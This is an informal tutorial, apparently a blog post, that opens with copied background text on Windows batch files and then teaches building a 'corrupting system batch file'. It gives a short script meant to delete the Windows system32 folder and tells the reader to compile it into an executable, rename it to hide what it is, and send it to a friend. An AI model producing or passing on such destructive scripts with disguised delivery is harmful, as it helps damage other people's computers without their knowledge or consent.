A batch file may contain any command the interpreter accepts interactively at the command prompt. A batch file may also have constructs ( IF, GOTO, Labels, CALL, etc.) that enable conditional branching and looping within the batch file.
Similar to job control language and other systems on mainframe and minicomputer systems, batch files were added to ease the work required for certain regular tasks by allowing the user to set up a script to automate them. When a batch file is run, the shell program (usually COMMAND.COM or cmd.exe) reads the file and executes its commands, normally line-by-line.[1]Unix-likeoperating systems (such as Linux) have a similar, but more flexible, type of file called a shell script.[2]
The filename extension.bat was used in DOS, and the Windows 9x family of operating systems. The Microsoft Windows NT-family of operating systems and OS/2 added .cmd. Batch files for other environments may have different extensions, e.g. .btm in 4DOS and 4NT related shells.
There have been changes to the detailed handling of batch files; some of the detail in this article is applicable to all batch files, while other details apply only to certain versions."
bla bla bla and bla bla bla.... i hat eto read it.. but it is very "helpfull"... waarr... lets getting start with the command..
Second, i want you to know "Delete" command.. it is just "del". So, if you want to delete some file just type "del [filename]".. simple isnt it??
You to have to know how to use CMD/command Prompt first.. then it could be easy to you for make this corrupting system batch file...
Now, open your notepad.. then type this:
@echo off
cls
cd c:\windows
del system32
Now, @echo off command is to hide the directory file from shown.. cls command is to clear up CMD windows... cd c:\windows, it is mean you re going to get in "windows" folder...
del system32 is mean you re going to delete system32 file...
Now, save this srcipt as all file and name it as corrupt.bat... now go to the Quick Batch File Compiler and compile it as executable file... then, rename it and send to your friend... ..